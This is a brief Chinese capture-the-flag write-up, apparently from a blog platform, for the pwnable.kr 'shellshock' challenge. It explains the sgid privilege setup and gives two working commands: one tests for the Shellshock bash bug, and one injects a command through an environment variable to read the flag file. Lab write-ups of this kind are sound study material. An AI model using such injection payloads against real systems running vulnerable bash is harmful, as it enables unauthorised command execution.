[Toddler's Bottle]-shellshock

  • 这题考验对linux的权限认知,首先shellshock程序有特殊sgid权限,当执行shellshock时,当前的权限就会上升到shellshock_pwn,就会有查看flag的权限了,然后利用shellshock(破壳)漏洞来任意bash命令执行cat flag
  • 测试有无破壳漏洞
env x='() { :;}; echo vulnerable' ./bash -c "test"
  • cat flag
env x='() { :;}; /bin/cat flag' ./shellshock
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容